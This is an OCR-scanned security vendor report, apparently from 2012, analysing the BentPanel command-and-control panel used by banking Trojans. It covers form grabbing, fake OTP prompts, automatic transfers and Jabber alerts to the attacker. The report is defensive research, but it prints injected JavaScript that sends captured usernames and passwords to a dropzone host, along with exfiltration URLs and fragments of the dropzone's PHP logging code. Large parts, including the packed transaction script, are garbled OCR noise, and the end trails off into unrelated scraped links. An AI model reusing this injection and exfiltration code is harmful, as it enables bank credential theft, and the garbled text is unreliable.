Home
Command and Control Form grabber
Contents
1. 0 var script document createElement script script type text javascript head appendChild script script src 000000000000 S bname demobank activ adata username document getElementById useraname value password document getElement ById password value window location In some cases the attacker will also use a flash based cookie capturing method to receive the victim s cookie The injected code will include the following URL http nfriedly github com Javascript Flash Cookies storage swf T andling cross domain flash cookies SwfStore SwfStore is a JavaScript library for cross domain flash cookies It includes a swf file that handles the storage and a JavaScript interface for loading and communicating with the flash file Getting started instructions hittp nfriedly com techblog 2010 0 7 swi for javascript cross domain flash c ookies Working example http nfriedly github com Javascript Flash Cookies The cookie is sent to the attacker s dropzone using this request http dropzone net XXX tXXXX php bname demobank amp GetCookie 3 Once the attacker has the victim s information the victim is asked to wait While he is waiting the transaction can be made Demo Bank 7 n User Name Please wait while we check your account Password A VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3
2. 7 d i 19 j e 3 T74N f g h j sD E u b x 4R 9 a w V av 79 bD w V R 79 c W 1V 6X 6Y 62Z 70 3P 71 7 a amp a B gt 0 F 9 i 0 i lt a B i F 9 e 07e lt c B e 7 e 0 e lt c B e 7 b i X U M c e 1 p i A C L 9 4S x 9 g v 9 h W 1V 79 379 k 9 17 9 m 9 n 72 0 73 0 79 o 2L 0 4T 1 79 p 3f v 9 q 9 7q amp 4Y amp 4Y lt la gt lt 4U gt x 2N a b u a amp amp b a V b v x 4Z a 7 a amp amp a B gt 0 F 9 i 0 i lt a B i h 7h a i x 50 F 9 i 0 i lt h B i 7 h i u E u v x 1k a 7 t s 20 y u x 3Y a b 7 as ik a B gt 1 9 c 1k a M q 2k 1 2E v 9 d 1M 1k a 9 e d 3U b 7 c d d 1 9 f a T iv 1X d 1X e lt 02e 1 e q 2k q 3Z q 2k a T x 2P a b 7 a amp a B gt 1 b gt 0 f a a iv sii 7i b 51 O F 9 i 0 i lt ib B i 7 a U M ib i in U 1 a U M ib i io u E 40 7j u v u v u vix S2 F 9 1 071 lt 1b B 1i 0 2L 3U 1b i 1im 0 2L 0 4T x 53 7 36 3 36 0 2L x 54 7 35 3 35 0 2L x 55 7 37 9 a 7 2P 1k b 4 0 a i A C L y 7 58 20 S 1k b 4 amp amp 2P 1k b 2 1 a i A C L 7 a it1 7 1k a it1 M 1 7k 1 amp 61k a it 1 U M 71 1 a i i 0 i lt a B i 9 b 2N a i 57 7 b amp amp b B gt 0 7 2P 1k b 1 0 a i A C L p 3f E y 7 2P 1ik b 2 1 amp amp 58 20 5 1k b 1 a i A C L p 3f E 7 p 3f amp 7q 7r 3g 7s
3. 2M 3q 7t 2M 3q 7u 2M 7v 7w 3X 3X 3q 7x 2M Sa 7Ty 19 Sb gt 5c 5d Se lt la gt y 2c 1y T lt la 5a 5f 41 5 41 7z 7A 7B 19 5Sb 50 53 x 5q 33 e3h 4S73h 5n 35 36 37 2c 2x Sk 7 7C 1j 3T 7 1j 16 B gt 0 amp amp 1j 16 0 7D 51 u y 7 13 16 B gt 0 amp amp 1j 16 0 7 1 243 4461F212 3j 7 70 2ZA 1 16 2 1q 1 16 7 3 57 40 1 16 7 4 SHE Sea Sul yi 1197 9 aw 1V sa 1 16 Sn a 1 i 2Esv3S0 a 2 a W 1V 9 b 15 7 b M 4P 1 a b 16 10 a 1 in a 2 2u 2m a 3 gt 24 2m a 4 s2v 2m a 5 79 r 3e 7 r O 1 u y 9 c 9 d 377 2Q P Q i 5 d 3 c 1N 21 P Q 45 5r 46 1B D c E 7 46 0 1 su y 1C 46 N d su u y H 71I 3I 3W 2z 7J 1K 7K 4Q O 1 u y 7 1i 99 1qg 2 s2n 1q 2 4 su 7 w I 3k w I 3k 1y 3a w 1I 3k 79 c w 2w 7L c 7M 2d 7N 0 19 3k 77 c 2F c 47 x 7 c 2F 70 c 2F 30 c 47 2B b vic 7P x b c 1 7 4K 1A amp 7Q i S a fw Y N 1N 1p P Q 1 25 26 1p21f 43 4461f 1r 35 u a a iv g 28 iv g 29 Su a 5k x Sm 4R 77 3HE 3h 5i 3h 75 3C 1z 3Q y 7 10 2 49 y 7 10 3 5x y 7 10 4 7 7T 4E yf 1ic 2E y 7 10 5 ic 2E x 2n a b 10 b79 c 1r 7U F 9 d 3P a c E 0 1r 7V amp 1ld 4K 1d 61Z 20 W 21 x 5z 2b 31 19 31 77 1Q 31 lt 1 2R SA r n
4. The TAN s administration panel Log off Bent Admin Current time 09 24 10 Options User Agent Help BotAdmin Show actions Netherlands DropAdmi Portugal 65 k limit if 5 65 kimi fs The IP of Date and Minimum the BOT time TAN value Maximum The attacker s transfer TAN value limitations VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 The transactions configurations P pentAaqmin Current time 08 40 51 Bank Options User Agent Help BotAdmin how actions Netherlands DropAdmin Netherlands BaN Satran otiont 335 o o m o es a n an o E ae The amount configurations The User s Manual originally in Russian Statuses 0 at login screen is displayed in the process of waiting for 5 minutes 1 requested token 2 requested token 5 at login window is displayed during the process of waiting 15ti seconds 999 blocking access if you do not change the status of 0 for example you are not a companies we waited 5t minutes the bot will be able to log in and he setted status 5 when a change of status from 0 to 1 token is requested immediately if the status of 1 on any you do not change through the minutes of 5t token is requested again when receiving the
5. pts started empty pnwrite state 1 jsess msg By function ction ByArgs a var b tag false error false element false VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Summary e The bentpanel is a very convenient platform to control the Trojans received information e tis very simple to implement and does not require any special skills from the attacker e tcaptures all of the information in an SQL database and logs it in TXT files as well e The platform widely spread and very common on the wild especially in Europe e The platform is equipped with real time alerting the attacker regarding attacks VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com
6. Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Example of the information recived via the Jabber Alerts x The information as it is displayed to the attacker 20120528 08 40 37 Incoming data IP HEB Additional data EERE Looin 5 QREEPS Pasnummer 093 https vv aaa Admin file The file loads the attacker s management console Loading this page will provide him with the console that enables him to view edit and manage his captured credentials The page is usually password protected and looks like this A a D 09 lt gt Password Login VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Once the attacker enters his password he is able to review the captured information There are more than a few management consoles with different types of functions features and graphics The most basic one looks like this Z Country onebank cantik orooro oo e e bo bo e a nanihesk fifthbank Another example x Google v 9 Search 7 Si Translate More gt gt Sign In Log off i Bent Admin Current time 08 37 30 Bank Options User Agent Help BotAdmin Netherlands Germany DropAdmin Netherlands
7. attacker The system is widely spread since it is very simple to implement and very user friendly The system includes the following features e Creation of users credentials database SQL and text files e Realtime victim alert via Jabber e Custom skins for management Recognition of the system This kind of C amp C can be identified according to the post request that is sent from the infected computer to the location of the system The request usually contains the following parameters this is the request sent from the user The bank s name According to the According to the The bank s URL Parameter bank s forms bank s forms http dropzone net xxx xxx php gt bname bankname amp activ amp adata Password 1234567 authcode 543214https demobank com Login2 0 RTLogbn login aspx guid a2c313c7 eca2 4224 a95f 9d9c3e050a97 The victim s identifier Another common identifier of the system is the waiting sign that is injected to the user while the information is sent to the attacker and the transaction is executed The GIF looks like this spinning wheel ly Usually by the same name It can be usually found at http dropzone net xxx xxxxxxx_loading gif VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Important files The C amp C pl
8. token changing status from 1 to 2 immediately requested the token immediately as when changing from 2 to 1 if the status of 2 on any you do not change through the minutes of 5t token is requested again by changing the status to 999 blocked the entrance status 5 put those users whose status was 0 and they waited five minutes came to the site Options Sender Pass whipped toads sender Sender Jid Toad the sender it should be zaregatsya anywhere BentAdmin Pass flogged by admin Reciever Jid your gills gills that will receive messages from the gills Display Bot Limit the number of boats displayed in the list of bots to each jar Deafault status the status of the default if left on for a long time to put a better status 5 List Bot Bot Ip IP bot Time Time date of the last call Status status of the bot Query a query which zavprashivat a bot with the statuses 1 2 Min value the minimum number of characters request Max Value Maximum number of characters request Reservel reserve not used Reserve2 reserve not used Comment Additional comment message which will be seen boty with the status of 999 for example the phone slides 555 55 555 Color color used for myself so it was easier to orentirovatsya bots Own Comment your comment ispolzketsya pametki for themselves as for example to record the balance Action save changes to a specific bot Show Actions Search Bot by Ip search bots descend to the appropriate IP Status
9. v 1lu d a 0 V c k 7 d amp amp d B gt 0 F 9 i O i lt d Brit F 9 e 2 e lt a Bre 9 f W 34 ale 16 1 3E 7 d i 3F a e 16 0 2Bee S d i 3F al e 16 0 v x 4x a 9 b 1H v lu v 4wiv 7 a amp a B gt 2 9 c a O0 V al1 7 c amp amp c B gt 0 F 9 i 0 i lt c B i F 9 e 2 e lt a Bret 9 d W 34 ale 7 d S c i T U b 1H E yf 4x 3G 2D 4u 9 3H v 9 35 2D 2C w 17 19 60 79 36 2D 2C w 17 19 6h 79 2c 2D 2C w 31 19 6i 79 37 2D 2C w 3I 19 65 9 38 W 1V 9 1b W T 37 y 7 1h 3N amp amp a amp amp a 2F 30 3L a 39 w 3M 4A 37 x 4Bl a b i7 a i7 w 1I iW fw 1I 1W ly 3a w I 1W 7 w 1I 2G iw 1I 2G 1y 3a w 1I 2G 6k 3Li4y 3M 61 6m 0 gt lt 4C gt s d lt 2y 6n 6o lr a 19 26 6p 1W gt F 9 e 3P b dt lt 20 4 4D 1I e gt b e lt 2d 4D gt d Ss N a Y N 3R 0 a Y N 4F 1 gt 38 2e 14A 38 6r K b r n a 4G T 4B 63 38 u E x 1X a fa a 4H iv SI a 27 6t a a 0 4I a 2J 6u a a 270 35 a 2 0 6v 2K a2 a 270 35 a 2 4H 37 2K lt 10 2K 0 4 2K F 9 i 0 i lt 2d 3S a B 1 i 3 i a a 4d 0 a B 4 i 3 a 40 a B 4 i 7 a 2B a 3T a 2B a 3T ja a _ u v y u E x K b x 13 a u S f 3c a gt gt 4 3c a amp 6x 9 c 6y 6z 9 d amp 2 9 e c d 9 h b 3c i 7 c M h 1 g g h
10. 0 RTLogbn login aspx guid a2c313c7 eca2 4224 a95f 9d9c3e050a97 P Xz 127 0 0 1 demobank default php Captured by the Trojan The request that is sent from the user s browser after submitting the information in this case demo bank would be http dropzone net XXX XXX php bname demobank amp activ amp adata username 1234567 password 54321 https demobank com login php guid a2c313c7 eca2 4224 a95f 9d9c3e050a97 This is a part of the injected code that sends the information to the dropzone function o00000000000 7 i The request that will be o00000000000 o00000000 var head document getElementsByTagName head 0 sent to the main file var script document createElement script script type text javascript head appendChild script script src o00000000000 S bn ame demobank activ adata username document getElementById useraname value password document getElement ById password value window location After the user s credentials are captured by the Trojan the HTML injections are done in order to capture the user s OTP to conduct the automatic transaction The attackers display different types of messages to the user in order to fool him to enter his OTP TOKKEN TAN VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe C
11. 4 7W 7u 7 1M 1R X B 466 1M 15 X B 4 1G X 1R X 2a X 15 X 30 H 5z z z 25 13 ZIN 20 1 sutz 6 a le vra 2Tl rubvi2Ri SA r n 4 7X ulblix 48la b 9 c a ViI R 7 c amp amp c BOO F 9 i O i lt c B i icfil ie b ix 5 A sample of the code de obfuscated ppacity value 0 ppacity object ppacity is set false bpcTimeout List of all aaa ppacity div document getElementById opacity div the simple wait div document getElementById simple wait div an div document getElementById tan div varia b es an div operation id document 5 getElementById tan div operation id that are an_div_button document getElementById tan_div_ button an_div_a document getElementById tan_ div a use d fo r th e an div select document getElementById tan_ div select an div input _1 document getElementById tan_ div input 1 attack an div input 2 document getElementById tan div input 2 an wait img document getElementById tan wait img ogin input GetObjectByName document user input false ba ssword input GetObjectByName document password input false ogin form GetObjectByName document Form Auth form true GetObjectByName document loginformi form true ogin_form_onsubmit GetAction login form onsubmit prig tanl input prig tan2_ input prig card select prig operation_id label login empty password empty
12. 77 of infections are from legitimate sites to safeguard the information transmitted between the client Most financial Trojans e g Zeus have long life spans and may be undetected by an anti virus and the organization Over 537 active Zeus crime ware domains active worldwide Script injections Recently several Trojan horses i e Zeus SoyEye CarBerp started using script injection techniques in order to modify the original web page The modification may enable the attacker to perform money transactions using the victimized users credentials This may be perpetrated by a Trojan horse injecting a malicious java script code to the client s browser once the client is connected to the website The code that is injected perform different functions including attempting a money transfer from the client s account VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 In order to maintain the information sent by the Trojans the attackers have developed different types of command and control systems that enable them to grab and manage the information sent by the Trojan The systems are usually PHP based systems accompanied by an SQL database Malicious Script in the source C o View Soe
13. 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Executing the automatic transaction Two common ways e Injecting a Javascript on the client side that will use the captured user information credentials cookie and OTP to perform the automatic transaction e Using an automated script on the server side that will use the victim s captured information in order to perform the transaction Both ways are found on the wild and can be used by the attacker Here is a sample of a Javascript that is loaded on the victim s side and is able to perform the transaction Eval eval function p 4 c k e zr e function c return c lt a e parseInt c a c cta gt 35 String fromCharCode c 29 c toString 36 if replace String obfuscation E e sete tease ne RegExp b e c b g k c sreturn p 9 z 1 9 1i 1 9 D 9 3v 9 1x 6a 9 2t 0 9 H 9 1D TF 4n P Q 7 7 P Q i S w 40 w 40 P Q 79 2X w 1I 2X 37 2KEE 1p P V QUA LE A 25 26 1p i S w N 2X A C L x 3w 9 a w 1I 6b 7 a a A C L 9 1t 0 9 1g 9 27 v 9 22 9 3y 9 11 w 1I 11 79 14 w 1 14 79 15 w 1 15 79 3z w 1 3z 79 30 w 1 30 79 3i w 1 31 79 1Q w 1 1Q 79 1R w I 1R 9 15 w 12 1T w 6d 2y E 1T w 6e 2y E 29 3C 4t 1zZ 733 59 1G 9 2a79 2b 9 3D 9 1A 22 7 79 2A 2z 9 1q 2z 9 10 179 1j 9 4u x x 4v a 9S b 1H
14. Search the slope bot to the desired status Own Comment search bots descend with a certain mark for themselves on the field Own Comment button Search provides Search Logs for bank log duplicated that was sent to the recipient zhabyuer button Delete Text Log clear text log of the bank button Delete User Agent Log log user agent to clear the button Delete SQL Logs clear the list of bots button Delete All Logs clear text logs of the bank log user agent and a list of bots button Delete Bot By Status remove from the list of those bots bots that have a status button Delete Bot By Comment remove from the list of those bots bots that have a specific your comment Own Comment Button Enable Disable Jabber enables or disables the sending of the bank in zhabber at Off position with the bank s new bots will automatically put the status of five VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 The victim s side The user connects to the bank s login page The Trojan identifies the page as a target and injects the malicious code into the user s browser The code captures the user s credentials and sends them to the attacker s drop zone http dropzone net XXX XXX php bname bankname amp activ amp adata Password 1234567 authcode 54321 https demobank com Login2
15. atform contains a few important files that enable it to capture the information that is sent from the victim The most are important files are e Main file captures the information logs it and delivers it to the database e Database connection configuration file e C amp C management file e Jabber connection Main PHP This file is the most important file on the platform The request that is sent from the victim after the injection is delivered to this file which is able to parse the information log it and enter it to the database The request that is sent from the victim looks like this http dropzone net xxx xxx php gt bname bankname amp activ amp adata Password 1234567 authcode 543214https demobank com Login2 0 RTLogbn login aspx guid a2c313c7 eca2 4224 a95f 9d9c3e050a97 If we look on the XXX php code we can see how it handles the information 1 Connecting to the database the main file includes the config file that contains the information that enables it to connect to the database SQL 2 The file verifies that the information that is received comes from a known bank if not the information is dropped Please note this verification doesn t appear in all the dropzones Some of the main files create a new client according to the information that is received The server s configurations file variables lt php The database connection parameters Sdbhost Sdbuser Sdbpass gt Sdbname d
16. efault status 0 Sjabber server xmpp jp F The Jabber connection Sjabber id ewy credentials Jabber pass or Er Ham ree your Jabber a gt VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Including the Bank verification xxxx php file lt php if isset _GET Il in_array _GET array link mysql_connect dbhost S dbuser dbpass if link die mysql_error Connecting to the database with the configuration if mysql_select_db dbname parameters die mysql error 3 Parsing the information and inserting it into the database SQL and TXT file De mysql_real_escape_string _GET if isset _ GET Af Sresult die die Could not query mysql error Checking if it the first recorded information if mysql num rows S result gt 0 row mysql fetch assoc Sresult F mysql_query i mysql real escape string SERVER if mysql num_rows result gt result mysql query intval time mysql real escape string _ SERVER n Srow la else result mysql_query intval time mysql real escape string _SERVER S default status row Srowl
17. elping them prevent harm to their brand image and avoid significant economic damage Furthermore Versafe provides professional services and advanced research capabilities in the field of cybercrime including malware Trojan horses viruses and infringing materiel VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 The Threat Trojans are malware that appears to the user to perform a desirable function but perhaps in addition to the expected function steals information or harms the system Two main techniques used by Trojans in order to steal the users credentials or initiate money transactions on their behalf are e Modifying the website s client side webpage e Sniffing the browser s activity for information which is sent to different banks before the packets are encrypted by SSL Versafe s knowledge is based on extensive research into the Malware attacks have grown by 600 since several forms of Trojan infections experience with cleaning 2008 infections and repairing the damage caused by zero day Top 20 malwares gt 1 25M infected computers Anew web page is infected every 1 3 seconds threats Our deep understanding of how the malware works is 2M web pages infected each month the key to producing the right defence mechanisms required lt
18. i i formation O oau message oriented middleware 2 It was pear E re ey see ee developed by the Jabber open source a ee eer community in 1999 Built to be extensible Jethis resouna esanourie the protocol has been extended with pn ee ee features such as Voice over Internet gt this gt basejid this gt user this gt host Protocol and file transfer signalling gt this gt roster new Roster gt this gt track_presence true gt this gt stream_start lt stream stream to Sserver Tersion 1 0 gt this gt stream_end lt stream stream gt gt this gt default_ns jJabber client S this gt addxXPathHandler http Sthis gt addxXPathHandler urn i Sthis gt addxXPathHandler urn i parameters Sthis gt addxXPathHandler urn i URL s and server The massage that is sent via Jabber as coded in the main file include yy Sconn new XMPPHP_XMPP S jabber_ server 5222 jabber_id jabber_pass QR null Sprintlog true loglevel LOGGING_INFO conn gt connect The Jabber s control panel The message that is sent to the Log off attacker Current time 09 30 28 Bank Options User Agent Help BotAdmin Netherlands DropAdmin Netherlands Ch am E The attacker s system password VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel
19. iE row Slogfile fopen ER fwrite Slogfile SERVER fclose Slogfile Choosing the bank s parameters Checking if the victim s IP exists in the database if it does it modifies it s properties and if it doesn t it creates a new record Logging the information into the bank s txt file Please note the information that is recivied and logged In the TXT file is not checked and sanitized which means it can contain any random information VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 XMPP and Jabber 4 Informing the attacker of new information logged in What are XMPP Extensible Messaging the database via XMPP and Jabber and Presence Protocol and Jabber The XXXX php file contains the connection parameters f f aa Extensible Messaging and Presence and functions and included in the main file Here is a Protocol XMPP formery named labber sample of the XXXX php file is an open XML based protocol originally aimed at near real time extensible instant messaging IM and presence information e g buddy lists but now expanded into the broader realm of The basic public function construct host Sport user Spassword connection parent construct host Sport S printlog loglevel
20. ne htp erww demohank iomat Dropzone Pan Oe oh p ie oe p eh ara Ta te ew wh org Lit ohne or yer tee oms type beni Si of ml e ee Com wreeTL ee te my 1 a Se ee ad ok ea oi me a Saat cel eal he ope alas ete lt ail SOC EEEE ETTORE script language javascript wee trttp eww becker com Aste Trenmuter po lt reript gt TW as Ta AT A TY alae riers uae ea TTT tear a IA Td anh i i E iR t rey im FEFE Infected computer The Botnet architecture In order to avoid shutdown and fast detection the attacker is using several proxy servers under different domains that forward the information to the main server This method enable the Botnet to exist if one of the domains servers is shutdown The basic structure looks like this T SPETESISEST STP UTEEEEROEED P Te zA seas LL LLL anne FEST T SESTTETISSTON SATETERLETEREE Fa The attackers main server Domains that serve as proxies VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com COT versafe Confidential VERSAFE June 2012 BentPanel command and control platform The Bentpanel C amp C platform is a very simple platform written in PHP that has the ability to receive the victim s information sort the information and display it to the
21. onfidential VERSAFE June 2012 How it works 1 The victim gets a massage related to new security steps needed for his account Dear client The main concern of the bank is and remains the highest possible level of service delivery for our customers in compliance with all required quality and safety standards aN j Currently there is the security system updated and tested Demo Bank Every step of the subsequent verification process can take up 5 minutes long Be patient please and do not try to refresh the page if you follow these steps Password To prevent unauthorized access to your bank account to come We want to be sure that exactly the real owner of this account 2 The client is requested to enter his OTP Demo Bank 3 Dear client User Name Password Please provide us with your OTP in order to continue OTP VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 The information is delivered to the attacker s dropzone as well as can be seen according to the injected code function o00000000000 The request that is sent to the o00000000000 000000000 attacker including the OTP var head document getElementsByTagName head
22. versafe secure login Command and Control Form grabber Trojans ATC Automatic transaction y Bent Admin The material in this report is strictly confidential and contains proprietary information and ideas of Versafe Ltd versafe Confidential VERSAFE June 2012 Versafe Introduction executive summary Versafe eliminates online identity theft and financial damages by preventing Phishing Trojans and Pharming attacks We also specialize in taking actions to foil online fraud and commencing shutdown of websites hosting infringing material Versafe offers products and services that complement existing anti fraud technologies improving the clients protection against the aforementioned malicious activity and providing an encompassing defence mechanism Versafe products are either software or services based customized to the needs of each client individually Versafe enables financial organizations working online to gain control over areas that were virtually unreachable and indefensible up till now and neutralize local threats found on their clients personal computers without requiring the installation of software on the end user side The transparent solution does not alter the user experience in any way facilitating a seamless installation on the firm s web sites Versafe s one of a kind solution has proven its exceptional effectiveness time and again in a large number of financial institutions worldwide h
23. vi9 j b 6B i 7 3 lt 6C q q 1s 5 7 j gt 6D amp amp j lt 6E g g 1s gt gt 6 6F g g 1s j amp 2g 2h 7 j gt 6G amp amp j lt 6H g g 1s j gt gt 12 61 sg q 1s g g 1s j gt gt 18 6K g g 1s j gt gt 12 amp 2g 2h g g 1s j gt gt 6 amp 2g 2h g g 1s j amp 2g 2h u g x 4t a b 7 a u 9 c a 3F b cH c 727 c 3R 0 8 U x c c f a V c 7 f amp F B gt 0 fF 9 1 071 lt f B71i 7 F i 11 amp e amp s amp F i 11 U M b U gt O amp d d amp amp E i 1 I b fe F i u e x 4L a b c d 9 e v77 a i9 f a Vic d f i 10 b fe f i u e x 1Bla b c 7 a c H 1B z z 1K 2i 2j u v9 d v 7 a i9 e a V a 7 e e B gt 0 F 9 i O i lt e B i 7 e i N ZI su vi y 7 c H 1B z 4z4 1K 4M ZI su v u d x G a b c d 9 e v 7 a 9 f a V c 27 EE B gt 0 F 9 i 0 i lt f B i 7 f i 19 amp 6 es amp amp f i 19 U M a 1L a 1L a 3d a T y u x 1M a 9 b a a 7 a B gt 0 9 c 6M F 9 i 0 i lt a B i 9 d a 3c i 7 c M d gt 0 7 d d sb d u 3U b H 3e z z 60 6P 3W 6Q 6R 65 6T u viy 7 1x gt 2u 1x lt 24 im 3V 1x 2v u E y 7 1x gt 24 1m 3V 24 2v u E y H 3e z z 6U 6V 3W 2B u im c ib e 6W j d x 40 a 9 b v 7 a M 4P gt 0 iu b y 9 c w 2w 1a c A C L w J 2I c c T a 9 d c V la 7 d f F 9 i 0 i lt d B i
Download Pdf Manuals
Related Search
Related Contents
Clinton Instrument Company Roland DP990RF Electronic Keyboard User Manual 「夢ねこスマイル」 9月16日より発売開始! Centrale g6 it - Notice installation utilisation Istruzioni d`uso BigTel - PowerAiD.it PowerAiD.it Chapin 84000 PDF Singer 7430 Sewing Machine Lenovo ThinkCentre A70 Copyright © All rights reserved.
Failed to retrieve file